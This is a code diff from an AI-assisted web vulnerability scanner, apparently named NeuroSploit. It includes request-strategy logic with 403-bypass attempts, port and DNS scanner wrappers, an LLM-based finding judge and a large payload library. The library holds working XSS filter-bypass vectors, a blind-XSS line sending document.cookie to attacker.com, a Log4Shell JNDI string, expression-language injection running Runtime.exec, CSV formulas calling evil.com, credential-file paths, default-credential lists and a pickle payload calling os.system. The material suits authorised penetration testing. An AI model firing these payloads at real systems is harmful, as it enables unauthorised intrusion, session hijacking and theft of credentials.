            # A single 429 latches global rate-limit mode (see get_dynamic_delay).
            self._rate_limit_detected = True
        elif error_type in ("timeout", "connection_error"):
            ep.timeout_count += 1
        # Track consecutive failures
        if was_confirmed:
            ep.consecutive_failures = 0
            ep.findings_count += 1
            self._global_finding_count += 1
            if ep.findings_count >= self.HOT_ENDPOINT_THRESHOLD:
                self._hot_endpoints.add(ep.url)
        elif status in (0, 403, 429) or error_type != "success":
            ep.consecutive_failures += 1
            if ep.consecutive_failures >= self.DEAD_ENDPOINT_THRESHOLD:
                ep.is_dead = True
                logger.debug(f"Endpoint marked dead: {ep.url}")
        else:
            # Got a response but no finding -- not a consecutive failure
            ep.consecutive_failures = 0
        # Update vuln type stats
        vs.total_tests += 1
        if was_confirmed:
            vs.confirmed_count += 1
        else:
            vs.rejected_count += 1
        if status == 403 and error_type == "waf_blocked":
            vs.waf_block_count += 1
        if confidence > 0:
            vs._confidences.append(confidence)
            # Bounded window, same trimming scheme as response times.
            if len(vs._confidences) > 50:
                vs._confidences = vs._confidences[-30:]
            vs.avg_confidence = sum(vs._confidences) / len(vs._confidences)
        vs.success_rate = vs.confirmed_count / vs.total_tests if vs.total_tests > 0 else 0

    def should_test_endpoint(self, url: str) -> bool:
        """Check if an endpoint should still be tested."""
        ep = self._get_endpoint(url)
        if ep.is_dead:
            return False
        return True

    def should_test_type(self, vuln_type: str, url: str) -> bool:
        """Check if a vuln type should be tested on an endpoint."""
        ep = self._get_endpoint(url)
        vs = self._get_vuln_stats(vuln_type)
        # Skip if endpoint is dead
        if ep.is_dead:
            return False
        # Skip if this type has 0% success after 15+ global tests AND waf blocks
        if vs.total_tests >= 15 and vs.success_rate == 0 and vs.waf_block_count > 5:
            logger.debug(f"Skipping {vuln_type}: 0% success + WAF blocks")
            return False
        return True

    def should_reduce_payloads(self, vuln_type: str, tested_count: int) -> bool:
        """Check if we should stop testing payloads (diminishing returns)."""
        vs = self._get_vuln_stats(vuln_type)
        # Allow more payloads for types with good success rate
        if vs.success_rate > 0.1:
            return tested_count >= self.DIMINISHING_RETURNS_THRESHOLD * 2
        return tested_count >= self.DIMINISHING_RETURNS_THRESHOLD

    def should_attempt_403_bypass(self, url: str) -> bool:
        """Check if we should try 403 bypass for this URL."""
        ep = self._get_endpoint(url)
        attempts = self._403_bypass_attempts.get(ep.url, 0)
        # Require a repeated 403 pattern before spending bypass requests.
        return (
            ep.status_403_count >= 2
            and attempts < self.MAX_403_BYPASS_PER_URL
        )

    async def try_bypass_403(self, request_engine, url: str, method: str = "GET") -> Optional[Dict]:
        """Attempt 403 bypass with multiple techniques.

        Increments the per-URL attempt counter even on failure, so the
        MAX_403_BYPASS_PER_URL budget is always consumed. On success the
        endpoint is revived (un-marked dead) and the bypass is recorded
        for the report.
        """
        ep = self._get_endpoint(url)
        self._403_bypass_attempts[ep.url] = self._403_bypass_attempts.get(ep.url, 0) + 1
        result = await BypassTechniques.attempt_bypass(
            request_engine, url, original_method=method
        )
        if result:
            self._bypass_successes.append({
                "url": url,
                "method": result.get("bypass_method", "unknown"),
                "status": result.get("status", 0),
            })
            # Revive endpoint
            ep.is_dead = False
            ep.consecutive_failures = 0
            logger.info(f"403 bypass success: {url} via {result.get('bypass_method')}")
        return result

    def get_dynamic_delay(self) -> float:
        """Get current recommended delay between requests.

        Returns at least 1.0s once rate limiting has been detected,
        otherwise the baseline delay.
        """
        if self._rate_limit_detected:
            return max(self._global_delay, 1.0)
        return self._global_delay

    def should_recompute_priorities(self) -> bool:
        """Check if it's time to recompute testing priorities.

        True after ADAPTATION_INTERVAL tests or 120 seconds since the
        last recomputation, whichever comes first.
        """
        tests_since = self._global_test_count - self._last_adaptation_count
        time_since = time.time() - self._last_adaptation_time
        return tests_since >= self.ADAPTATION_INTERVAL or time_since >= 120

    def recompute_priorities(self, vuln_types: List[str]) -> List[str]:
        """Recompute vuln type priority order based on observed results.
        Promotes types with high success rates and deprioritizes failed types.
        Returns reordered list of vuln types.
        """
        self._last_adaptation_count = self._global_test_count
        self._last_adaptation_time = time.time()

        def type_score(vt: str) -> float:
            # Score in roughly [−0.2, 0.9]; untested types sit in the middle.
            vs = self._get_vuln_stats(vt)
            if vs.total_tests == 0:
                return 0.5  # Untested -- medium priority
            # Weighted: success rate + bonus for confirmed findings
            score = vs.success_rate * 0.6
            if vs.confirmed_count > 0:
                score += 0.3
            # Penalty for WAF blocks
            if vs.waf_block_count > vs.total_tests * 0.5:
                score -= 0.2
            return score

        scored = [(vt, type_score(vt)) for vt in vuln_types]
        scored.sort(key=lambda x: x[1], reverse=True)
        reordered = [vt for vt, _ in scored]
        logger.debug(f"Priority recomputed: {reordered[:5]}")
        return reordered

    def get_hot_endpoints(self) -> List[str]:
        """Get endpoints that have yielded multiple findings."""
        return list(self._hot_endpoints)

    def get_report_context(self) -> Dict:
        """Get strategy stats for report generation."""
        dead_count = sum(1 for e in self._endpoints.values() if e.is_dead)
        hot_count = len(self._hot_endpoints)
        # Top 5 types by number of confirmed findings.
        top_types = sorted(
            self._vuln_stats.values(),
            key=lambda v: v.confirmed_count,
            reverse=True,
        )[:5]
        return {
            "total_tests": self._global_test_count,
            "total_findings": self._global_finding_count,
            "endpoints_tested": len(self._endpoints),
            "endpoints_dead": dead_count,
            "endpoints_hot": hot_count,
            "rate_limiting_detected": self._rate_limit_detected,
            "bypass_successes": len(self._bypass_successes),
            "bypass_details": self._bypass_successes[:10],
            "top_vuln_types": [
                {
                    "type": v.vuln_type,
                    "tests": v.total_tests,
                    "confirmed": v.confirmed_count,
                    "rate": f"{v.success_rate:.1%}",
                }
                for v in top_types
            ],
            "hot_endpoints": list(self._hot_endpoints)[:10],
        }

    def get_endpoint_summary(self) -> Dict[str, Dict]:
        """Get summary of all tracked endpoints."""
        return {
            url: {
                "tests": ep.total_tests,
                "findings": ep.findings_count,
                "dead": ep.is_dead,
                "403s": ep.status_403_count,
                "avg_response": round(ep.avg_response_time, 3),
            }
            for url, ep in self._endpoints.items()
        }
+64
View File
@@ -135,6 +135,20 @@ class SecurityTool:
"command": "dalfox url {target} -o /opt/output/dalfox.txt --silence",
"output_file": "/opt/output/dalfox.txt",
"parser": "parse_dalfox_output"
},
"naabu": {
"name": "Naabu",
"description": "Fast port scanner",
"command": "naabu -host {host} -json -top-ports 1000 -silent -o /opt/output/naabu.json",
"output_file": "/opt/output/naabu.json",
"parser": "parse_naabu_output"
},
"dnsx": {
"name": "DNSX",
"description": "DNS toolkit",
"command": "echo {domain} | dnsx -silent -a -aaaa -cname -mx -ns -txt -o /opt/output/dnsx.txt",
"output_file": "/opt/output/dnsx.txt",
"parser": "parse_dnsx_output"
}
}
@@ -750,6 +764,56 @@ class DockerToolExecutor:
return findings
def parse_naabu_output(self, output: str, target: str) -> List[Dict]:
    """Parse naabu output (JSON-lines or plain ``host:port`` text) into findings.

    Fixes vs. the original: the unused ``host`` local is gone; JSON
    records without a ``port`` no longer produce phantom "0" entries;
    JSON lines that parse to a non-dict value (e.g. a bare number) no
    longer raise AttributeError.

    Args:
        output: Raw stdout / file content produced by naabu.
        target: The scanned target, reported as the affected endpoint.

    Returns:
        A single-element list with an informational "Port Discovery"
        finding when open ports were found, otherwise an empty list.
    """
    findings: List[Dict] = []
    ports: List[str] = []
    for line in output.split('\n'):
        line = line.strip()
        if not line:
            continue
        try:
            data = json.loads(line)
        except json.JSONDecodeError:
            # Text mode fallback: "host:port"
            match = re.match(r'^(.+?):(\d+)$', line)
            if match:
                ports.append(match.group(2))
            continue
        # naabu JSON lines are objects; guard against scalar JSON values.
        port = data.get('port', 0) if isinstance(data, dict) else 0
        if port:
            ports.append(str(port))
    if ports:
        findings.append({
            "title": f"Open Ports Found: {len(ports)}",
            "severity": "info",
            "vulnerability_type": "Port Discovery",
            "description": f"Found {len(ports)} open ports: {', '.join(ports[:20])}",
            "affected_endpoint": target,
            "evidence": f"Ports: {', '.join(ports)}",
            "remediation": "Review exposed services and close unnecessary ports"
        })
    return findings
def parse_dnsx_output(self, output: str, target: str) -> List[Dict]:
    """Turn raw dnsx stdout into one informational DNS-enumeration finding.

    Every non-blank line of ``output`` is treated as a DNS record entry;
    with no records an empty list is returned.
    """
    records = []
    for raw_line in output.split('\n'):
        entry = raw_line.strip()
        if entry:
            records.append(entry)
    if not records:
        return []
    finding = {
        "title": f"DNS Records: {len(records)}",
        "severity": "info",
        "vulnerability_type": "DNS Enumeration",
        "description": f"DNS records found: {', '.join(records[:10])}",
        "affected_endpoint": target,
        "evidence": "\n".join(records[:20]),
        "remediation": "Review DNS records for security issues"
    }
    return [finding]
# Global executor instance
_executor: Optional[DockerToolExecutor] = None
+321
View File
@@ -0,0 +1,321 @@
"""
NeuroSploit v3 - Validation Judge
Sole authority for approving or rejecting vulnerability findings.
No finding enters the confirmed list without passing through this judge.
Pipeline:
1. Run negative controls (benign payloads → compare responses)
2. Check proof of execution (per vuln type)
3. Get AI interpretation (BEFORE verdict, not after)
4. Calculate confidence score (0-100)
5. Apply verdict (confirmed/likely/rejected)
"""
import logging
from dataclasses import dataclass, field, asdict
from typing import Callable, Dict, List, Optional, Any
from backend.core.negative_control import NegativeControlEngine, NegativeControlResult
from backend.core.proof_of_execution import ProofOfExecution, ProofResult
from backend.core.confidence_scorer import ConfidenceScorer, ConfidenceResult
from backend.core.vuln_engine.system_prompts import get_prompt_for_vuln_type
from backend.core.access_control_learner import AccessControlLearner
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class JudgmentResult:
    """Complete judgment result from the ValidationJudge.

    Aggregates every verification artifact (proof of execution, negative
    controls, AI interpretation, confidence score) into one record that
    callers inspect to decide whether to store/report a finding.
    """
    approved: bool  # Should this finding be accepted?
    verdict: str  # "confirmed" | "likely" | "rejected"
    confidence_score: int  # 0-100
    confidence_breakdown: Dict[str, int] = field(default_factory=dict)  # per-component score contributions
    proof_of_execution: Optional[ProofResult] = None  # per-vuln-type proof check, if performed
    negative_controls: Optional[NegativeControlResult] = None  # benign-payload comparison, if run
    ai_interpretation: Optional[str] = None  # LLM reading of the response (absent when no LLM)
    evidence_summary: str = ""  # Hardened evidence string
    rejection_reason: str = ""  # Why was it rejected (if applicable)
# ---------------------------------------------------------------------------
# Judge
# ---------------------------------------------------------------------------
class ValidationJudge:
    """Sole authority for approving/rejecting vulnerability findings.

    Orchestrates negative controls, proof of execution, AI interpretation,
    and confidence scoring into a single JudgmentResult.

    Usage:
        judge = ValidationJudge(controls, proof, scorer, llm)
        judgment = await judge.evaluate(
            vuln_type, url, param, payload, test_response, baseline,
            signals, evidence, make_request_fn
        )
        if judgment.approved:
            # Create finding with judgment.confidence_score
        else:
            # Store as rejected finding with judgment.rejection_reason
    """

    def __init__(
        self,
        negative_controls: NegativeControlEngine,
        proof_engine: ProofOfExecution,
        confidence_scorer: ConfidenceScorer,
        llm=None,
        access_control_learner: Optional[AccessControlLearner] = None,
    ):
        self.controls = negative_controls
        self.proof = proof_engine
        self.scorer = confidence_scorer
        # Optional LLM client; AI interpretation is skipped when unset or unavailable.
        self.llm = llm
        # Optional learner of historical FP patterns for access-control vulns.
        self.acl_learner = access_control_learner

    async def evaluate(
        self,
        vuln_type: str,
        url: str,
        param: str,
        payload: str,
        test_response: Dict,
        baseline: Optional[Dict],
        signals: List[str],
        evidence: str,
        make_request_fn: Callable,
        method: str = "GET",
        injection_point: str = "parameter",
    ) -> JudgmentResult:
        """Full evaluation pipeline.

        Args:
            vuln_type: Vulnerability type (e.g., "ssrf", "xss_reflected")
            url: Target URL
            param: Parameter being tested
            payload: The attack payload used
            test_response: HTTP response dict from the attack
            baseline: Optional baseline response for comparison
            signals: Signal names from multi_signal_verify (e.g., ["baseline_diff"])
            evidence: Raw evidence string from verification
            make_request_fn: Async fn(url, method, params) -> response dict
            method: HTTP method used
            injection_point: Where payload was injected
        Returns:
            JudgmentResult with verdict, score, proof, controls, evidence
        """
        # Step 1: Run negative controls (benign payloads -> compare responses)
        control_result = await self._run_controls(
            url, param, method, vuln_type, test_response,
            make_request_fn, baseline, injection_point
        )
        # Step 2: Check proof of execution (per vuln type)
        proof_result = self.proof.check(
            vuln_type, payload, test_response, baseline
        )
        # Step 3: AI interpretation (BEFORE verdict so it can feed the score)
        ai_interp = await self._get_ai_interpretation(
            vuln_type, payload, test_response
        )
        # Step 4: Calculate confidence score (0-100)
        confidence = self.scorer.calculate(
            signals, proof_result, control_result, ai_interp
        )
        # Step 4b: Apply access control learning adjustment
        if self.acl_learner:
            try:
                body = test_response.get("body", "") if isinstance(test_response, dict) else ""
                status = test_response.get("status", 0) if isinstance(test_response, dict) else 0
                hints = self.acl_learner.get_evaluation_hints(vuln_type, body, status)
                if hints and hints.get("likely_false_positive") and hints.get("fp_signals", 0) >= 2:
                    fp_rate = self.acl_learner.get_false_positive_rate(vuln_type)
                    if fp_rate > 0.7:
                        # High historical FP rate + matching FP pattern -> penalize
                        penalty = -20
                        confidence.score = max(0, confidence.score + penalty)
                        confidence.breakdown["acl_learning_penalty"] = penalty
                        confidence.detail += f"; ACL learning penalty ({penalty}pts, FP rate: {fp_rate:.0%})"
                        # Re-derive the verdict from the adjusted score
                        if confidence.score >= self.scorer.THRESHOLD_CONFIRMED:
                            confidence.verdict = "confirmed"
                        elif confidence.score >= self.scorer.THRESHOLD_LIKELY:
                            confidence.verdict = "likely"
                        else:
                            confidence.verdict = "rejected"
            except Exception as e:
                # Best-effort adjustment: learning data must never break judging,
                # but don't swallow the error invisibly (was a bare `pass`).
                logger.debug(f"ACL learning adjustment skipped: {e}")
        # Step 5: Build judgment
        approved = confidence.verdict != "rejected"
        # Build evidence summary
        evidence_summary = self._build_evidence_summary(
            evidence, proof_result, control_result, confidence, ai_interp
        )
        # Build rejection reason if applicable
        rejection_reason = ""
        if not approved:
            rejection_reason = self._build_rejection_reason(
                vuln_type, param, proof_result, control_result,
                confidence, ai_interp
            )
        return JudgmentResult(
            approved=approved,
            verdict=confidence.verdict,
            confidence_score=confidence.score,
            confidence_breakdown=confidence.breakdown,
            proof_of_execution=proof_result,
            negative_controls=control_result,
            ai_interpretation=ai_interp,
            evidence_summary=evidence_summary,
            rejection_reason=rejection_reason,
        )

    async def _run_controls(
        self,
        url: str,
        param: str,
        method: str,
        vuln_type: str,
        attack_response: Dict,
        make_request_fn: Callable,
        baseline: Optional[Dict],
        injection_point: str,
    ) -> Optional[NegativeControlResult]:
        """Run negative controls with error handling; returns None on failure."""
        try:
            return await self.controls.run_controls(
                url, param, method, vuln_type, attack_response,
                make_request_fn, baseline, injection_point
            )
        except Exception as e:
            logger.debug(f"Negative controls failed: {e}")
            return None

    async def _get_ai_interpretation(
        self,
        vuln_type: str,
        payload: str,
        response: Dict,
    ) -> Optional[str]:
        """Get AI interpretation of the response (BEFORE verdict).

        Returns None when no LLM is configured/available or on any error —
        interpretation is strictly optional input to the scorer.
        """
        if not self.llm or not self.llm.is_available():
            return None
        try:
            body = response.get("body", "")[:1000]
            status = response.get("status", 0)
            # Inject access control learning hints for relevant vuln types
            acl_hint = ""
            if self.acl_learner:
                hints = self.acl_learner.get_evaluation_hints(vuln_type, body, status)
                if hints and hints.get("matching_patterns", 0) > 0:
                    fp_label = "LIKELY FALSE POSITIVE" if hints["likely_false_positive"] else "POSSIBLY REAL"
                    acl_hint = (
                        f"\n\n**Learned Pattern Hints:** {fp_label} "
                        f"(pattern: {hints['pattern_type']}, "
                        f"FP signals: {hints['fp_signals']}, TP signals: {hints['tp_signals']})\n"
                        f"IMPORTANT: For access control vulns (BOLA/BFLA/IDOR), do NOT rely on "
                        f"HTTP status codes. Compare actual response DATA — check if different "
                        f"user's private data is returned vs. denial/empty/own-data patterns."
                    )
            prompt = f"""Briefly analyze this HTTP response after testing for {vuln_type.upper()}.
Payload sent: {payload[:200]}
Response status: {status}
Response excerpt:
```
{body}
```
{acl_hint}
Answer in 1-2 sentences: Was the payload processed/executed? Or was it ignored/filtered/blocked? Be specific about what happened."""
            system = get_prompt_for_vuln_type(vuln_type, "interpretation")
            result = await self.llm.generate(prompt, system)
            # Keep interpretations short; cap at 300 chars.
            return result.strip()[:300] if result else None
        except Exception as e:
            # Optional step: log at debug instead of silently swallowing.
            logger.debug(f"AI interpretation failed: {e}")
            return None

    def _build_evidence_summary(
        self,
        raw_evidence: str,
        proof: Optional[ProofResult],
        controls: Optional[NegativeControlResult],
        confidence: ConfidenceResult,
        ai_interp: Optional[str],
    ) -> str:
        """Build hardened evidence string with all verification components."""
        parts = []
        # Raw evidence
        if raw_evidence:
            parts.append(raw_evidence)
        # Proof of execution
        if proof:
            if proof.proven:
                parts.append(f"[PROOF] {proof.proof_type}: {proof.detail}")
            else:
                parts.append(f"[NO PROOF] {proof.detail}")
        # Negative controls
        if controls:
            parts.append(f"[CONTROLS] {controls.detail}")
        # AI interpretation
        if ai_interp:
            parts.append(f"[AI] {ai_interp}")
        # Confidence score
        parts.append(f"[CONFIDENCE] {confidence.score}/100 [{confidence.verdict}]")
        return " | ".join(parts)

    def _build_rejection_reason(
        self,
        vuln_type: str,
        param: str,
        proof: Optional[ProofResult],
        controls: Optional[NegativeControlResult],
        confidence: ConfidenceResult,
        ai_interp: Optional[str],
    ) -> str:
        """Build clear rejection reason explaining why finding was rejected."""
        reasons = []
        if proof and not proof.proven:
            reasons.append("no proof of execution")
        if controls and controls.same_behavior:
            reasons.append(
                f"negative controls show same behavior "
                f"({controls.controls_matching}/{controls.controls_run} controls match)"
            )
        if ai_interp:
            ineffective_kws = ["ignored", "not processed", "blocked", "filtered",
                               "sanitized", "no effect"]
            if any(kw in ai_interp.lower() for kw in ineffective_kws):
                # Plain string (was an f-string with no placeholders, F541)
                reasons.append("AI confirms payload was ineffective")
        reason_str = "; ".join(reasons) if reasons else "confidence too low"
        return (f"Rejected {vuln_type} in {param}: {reason_str} "
                f"(score: {confidence.score}/100)")
+9 -1
View File
@@ -1,5 +1,13 @@
from backend.core.vuln_engine.engine import DynamicVulnerabilityEngine
from backend.core.vuln_engine.registry import VulnerabilityRegistry
from backend.core.vuln_engine.payload_generator import PayloadGenerator
def __getattr__(name):
"""Lazy import for DynamicVulnerabilityEngine (requires database models)"""
if name == "DynamicVulnerabilityEngine":
from backend.core.vuln_engine.engine import DynamicVulnerabilityEngine
return DynamicVulnerabilityEngine
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
__all__ = ["DynamicVulnerabilityEngine", "VulnerabilityRegistry", "PayloadGenerator"]
File diff suppressed because it is too large Load Diff
+617 -5
View File
@@ -48,11 +48,129 @@ class PayloadGenerator:
"<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
],
"xss_stored": [
"<script>alert('StoredXSS')</script>",
"<img src=x onerror=alert('StoredXSS')>",
"<svg onload=alert('StoredXSS')>",
"javascript:alert('StoredXSS')",
"<a href=javascript:alert('StoredXSS')>click</a>",
# Basic script tags
"<script>alert(1)</script>",
"<script>alert(document.domain)</script>",
"<script>alert(String.fromCharCode(88,83,83))</script>",
"<Script>alert(1)</Script>",
"<scr<script>ipt>alert(1)</scr</script>ipt>",
"<script/src=data:,alert(1)>",
"<script>alert`1`</script>",
# IMG event handlers
"<img src=x onerror=alert(1)>",
"<img src=x onerror=alert(document.domain)>",
"<img/src=x onerror=alert(1)>",
"<img src=1 onerror='alert(1)'>",
"<IMG SRC=x ONERROR=alert(1)>",
"<img src onerror=alert(1)>",
"<img src=x onerror=prompt(1)>",
"<img src=x onerror=confirm(1)>",
# SVG event handlers
"<svg onload=alert(1)>",
"<svg/onload=alert(1)>",
"<svg onload=alert(document.domain)>",
"<svg><script>alert(1)</script></svg>",
"<svg><animate onbegin=alert(1)>",
"<svg><set onbegin=alert(1)>",
# Other element events
"<body onload=alert(1)>",
"<input onfocus=alert(1) autofocus>",
"<input onblur=alert(1) autofocus><input autofocus>",
"<details open ontoggle=alert(1)>",
"<marquee onstart=alert(1)>",
"<video><source onerror=alert(1)>",
"<audio src=x onerror=alert(1)>",
"<video src=x onerror=alert(1)>",
"<select onfocus=alert(1) autofocus>",
"<textarea onfocus=alert(1) autofocus>",
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<div contenteditable onblur=alert(1)>click then lose focus</div>",
# Anchor/link
"<a href=javascript:alert(1)>click</a>",
"<a href='javascript:alert(1)'>click me</a>",
"<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)>click</a>",
"<iframe src=javascript:alert(1)>",
"<embed src=javascript:alert(1)>",
# Attribute escape + event handlers
'" onfocus=alert(1) autofocus x="',
"' onfocus=alert(1) autofocus x='",
'"><script>alert(1)</script>',
"'><script>alert(1)</script>",
'" onmouseover=alert(1) x="',
"' onmouseover=alert(1) x='",
'"><img src=x onerror=alert(1)>',
"'><img src=x onerror=alert(1)>",
'" autofocus onfocus=alert(1) x="',
# JavaScript context breakout
"</script><script>alert(1)</script>",
"';alert(1)//",
'";alert(1)//',
"'-alert(1)-'",
'"-alert(1)-"',
"\\\\';;alert(1)//",
"${alert(1)}",
"</script><img src=x onerror=alert(1)>",
# Encoding bypasses
"%3Cscript%3Ealert(1)%3C/script%3E",
"&#60;script&#62;alert(1)&#60;/script&#62;",
"&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
"<script>al\\u0065rt(1)</script>",
"<scr\\x00ipt>alert(1)</scr\\x00ipt>",
"javas\\tcript:alert(1)",
# WAF/filter bypass
"<img src=x onerror=alert`1`>",
"<img src=x onerror=window['alert'](1)>",
"<img src=x onerror=self['alert'](1)>",
"<img src=x onerror=top['al'+'ert'](1)>",
"<img src=x onerror=[].constructor.constructor('alert(1)')()>",
"<img src=x onerror=Function('alert(1)')()>",
"<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
"<svg><animatetransform onbegin=alert(1)>",
"<style>@keyframes x{}</style><xss style='animation-name:x' onanimationend='alert(1)'>",
"<form><button formaction=javascript:alert(1)>X</button></form>",
"<object data=javascript:alert(1)>",
"<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>",
],
# XSS Context-Specific Payloads
"xss_context_html_body": [
"<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
"<details open ontoggle=alert(1)>",
"<input onfocus=alert(1) autofocus>",
"<body onload=alert(1)>",
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<video><source onerror=alert(1)>",
],
"xss_context_attribute": [
'" onfocus=alert(1) autofocus x="',
"' onfocus=alert(1) autofocus x='",
'"><script>alert(1)</script>',
"'><script>alert(1)</script>",
'" onmouseover=alert(1) x="',
'"><img src=x onerror=alert(1)>',
'" autofocus onfocus=alert(1) x="',
"' autofocus onfocus=alert(1) x='",
],
"xss_context_js_string": [
"';alert(1)//",
'";alert(1)//',
"</script><script>alert(1)</script>",
"'-alert(1)-'",
"\\\\';;alert(1)//",
"</script><img src=x onerror=alert(1)>",
],
"xss_context_template_literal": [
"${alert(1)}",
"${alert(document.domain)}",
"${[].constructor.constructor('alert(1)')()}",
],
"xss_context_href": [
"javascript:alert(1)",
"javascript:alert(document.domain)",
"&#106;avascript:alert(1)",
"java%0ascript:alert(1)",
"data:text/html,<script>alert(1)</script>",
],
"xss_dom": [
"#<script>alert('DOMXSS')</script>",
@@ -282,8 +400,502 @@ class PayloadGenerator:
"test",
"../1",
],
# ===== NEW PAYLOAD LIBRARIES (68 new types) =====
# Advanced Injection
"ldap_injection": [
"*", ")(cn=*)", ")(|(cn=*", "*)(uid=*))(|(uid=*",
"admin)(&)", ")(|(password=*)", "*)(objectClass=*",
],
"xpath_injection": [
"' or '1'='1", "' or ''='", "'] | //user/* | //user['",
"' and count(//user)>0 and '1'='1",
],
"graphql_injection": [
'{__schema{types{name,fields{name,type{name}}}}}',
'{__type(name:"User"){fields{name}}}',
'{"query":"mutation{updateUser(role:\\"admin\\"){id}}"}',
],
"crlf_injection": [
"%0d%0aX-Injected:neurosploit", "%0d%0aSet-Cookie:evil=1",
"%0d%0a%0d%0a<html>injected", "\\r\\nX-Test:1",
"%0d%0aLocation:http://evil.com",
],
"header_injection": [
"evil.com", "%0d%0aInjected:true",
"target.com\r\nX-Injected: true", "evil.com%00.target.com",
],
"email_injection": [
"test@test.com%0d%0aCc:attacker@evil.com",
"test@test.com%0d%0aBcc:spy@evil.com",
"test@test.com%0aSubject:Hacked",
],
"expression_language_injection": [
"${7*7}", "#{7*7}", "${applicationScope}",
"${T(java.lang.Runtime).getRuntime().exec('id')}",
"${pageContext.request.serverName}",
],
"log_injection": [
"test%0aINFO:Admin_logged_in",
"${jndi:ldap://attacker.com/a}",
"test%0a%0aNEW_LOG_ENTRY",
"\\x1b[31mRED_TEXT",
],
"html_injection": [
"<h1>INJECTED</h1>", "<b>neurosploit_test</b>",
"<img src=x>", "<form action='http://evil.com'><input name=pw><input type=submit>",
"<a href='http://evil.com'>Click Here</a>",
],
"csv_injection": [
"=cmd|'/C calc'!A0", "=1+1", "+1+1", "@SUM(1+1)",
'=HYPERLINK("http://evil.com","Click")',
"-1+1", '=IMPORTXML("http://evil.com","//a")',
],
"orm_injection": [
"field__gt=0", "field__contains=admin", "field__regex=.*",
"' OR '1'='1", "field[$ne]=",
],
# XSS Advanced
"blind_xss": [
"<script src=//callback.attacker.com></script>",
"'><script>new Image().src='//attacker.com/?c='+document.cookie</script>",
"<img src=//callback.attacker.com/blind>",
],
"mutation_xss": [
"<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>",
"<svg></p><style><a id=\"</style><img src=1 onerror=alert(1)>\">",
"<noscript><p title=\"</noscript><img src=x onerror=alert(1)>\">",
],
# File Access Advanced
"arbitrary_file_read": [
"/etc/passwd", "/etc/shadow", "../../../.env",
"../../config/database.yml", "/proc/self/environ",
"~/.ssh/id_rsa", "C:\\Windows\\win.ini",
],
"arbitrary_file_delete": [
"../../../tmp/test_delete", "../../.htaccess",
"../../../tmp/neurosploit_test",
],
"zip_slip": [
"../../tmp/zipslip_test.txt",
"../../../var/www/html/shell.php",
"../../../../tmp/zipslip_proof",
],
# Auth Advanced
"weak_password": [
"123456", "password", "abc123", "qwerty",
"aaaaaa", "12345678", "Password1", "test",
],
"default_credentials": [
"admin:admin", "admin:password", "root:root",
"test:test", "admin:admin123", "user:user",
"admin:changeme", "admin:default",
],
"two_factor_bypass": [
"000000", "123456", "skip_2fa=true",
"verify=false", "step=3",
],
"oauth_misconfiguration": [
"redirect_uri=https://evil.com",
"redirect_uri=https://target.com.evil.com",
"redirect_uri=https://target.com/callback?next=evil.com",
],
# Authorization Advanced
"bfla": [
"/api/admin/users", "/api/admin/settings",
"/api/admin/create-user", "/admin/config",
],
"mass_assignment": [
'{"role":"admin"}', '{"is_admin":true}',
'{"verified":true}', '{"balance":99999}',
'{"account_type":"premium"}',
],
"forced_browsing": [
"/admin", "/dashboard", "/api/admin",
"/internal", "/debug", "/console",
"/actuator", "/swagger-ui.html", "/.git/config",
"/.env", "/backup.sql", "/phpinfo.php",
],
# Client-Side Advanced
"dom_clobbering": [
'<img id="x" src="evil.com">',
'<form id="x"><input id="y" value="evil"></form>',
'<a id="CONFIG" href="evil://payload">',
],
"postmessage_vulnerability": [
'window.postMessage("inject","*")',
'window.postMessage(\'{"cmd":"getToken"}\',\'*\')',
],
"websocket_hijacking": [
"new WebSocket('wss://target.com/ws')",
],
"prototype_pollution": [
'{"__proto__":{"isAdmin":true}}',
'{"constructor":{"prototype":{"polluted":true}}}',
'?__proto__[isAdmin]=true',
'?__proto__[test]=polluted',
],
"css_injection": [
"color:red;background:url(//evil.com/test)",
"};body{background:red}",
"input[value^='a']{background:url(//evil.com/a)}",
],
"tabnabbing": [
'<a target="_blank" href="http://test.com">Test</a>',
],
# Infrastructure Advanced
"directory_listing": [
"/images/", "/uploads/", "/backup/",
"/static/", "/assets/", "/media/",
"/files/", "/docs/", "/data/", "/logs/",
],
"debug_mode": [
"/nonexistent_page_404_test", "/?debug=true",
"/phpinfo.php", "/actuator/env",
"/debug/pprof", "/__debug__/",
],
"exposed_admin_panel": [
"/admin", "/administrator", "/admin/login",
"/wp-admin", "/cpanel", "/phpmyadmin",
"/adminer", "/manager/html", "/jenkins",
],
"exposed_api_docs": [
"/swagger-ui.html", "/swagger-ui/", "/api-docs",
"/openapi.json", "/swagger.json", "/graphql",
"/graphiql", "/redoc", "/v1/api-docs",
],
"insecure_cookie_flags": [], # Inspection-based, no payloads
"http_smuggling": [
"Content-Length: 6\r\nTransfer-Encoding: chunked",
"Transfer-Encoding: xchunked",
],
"cache_poisoning": [
"X-Forwarded-Host: evil.com",
"X-Forwarded-Scheme: nothttps",
"X-Original-URL: /admin",
],
# Logic & Data
"race_condition": [], # Requires concurrent requests, not payloads
"business_logic": [
"-1", "0", "0.001", "99999999",
"-99999", "NaN", "null", "undefined",
],
"rate_limit_bypass": [
"X-Forwarded-For: 1.2.3.4",
"X-Real-IP: 1.2.3.4",
"X-Originating-IP: 1.2.3.4",
],
"parameter_pollution": [
"param=safe&param=malicious",
"param[]=a&param[]=b",
],
"type_juggling": [
"0", "true", "[]", "null",
'{"password":0}', '{"password":true}',
],
"insecure_deserialization": [
"rO0ABXNyAA...", # Java serialization marker
'O:4:"User":1:{s:4:"role";s:5:"admin";}', # PHP
"gASVDAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg==", # Python pickle
],
"subdomain_takeover": [], # DNS-based, not payloads
"host_header_injection": [
"evil.com", "target.com:evil.com@evil.com",
"evil.com%0d%0aX-Injected:true",
],
"timing_attack": [], # Time-measurement based
"improper_error_handling": [
"' \"", "{{invalid}}", "<>!@#$%^&*()",
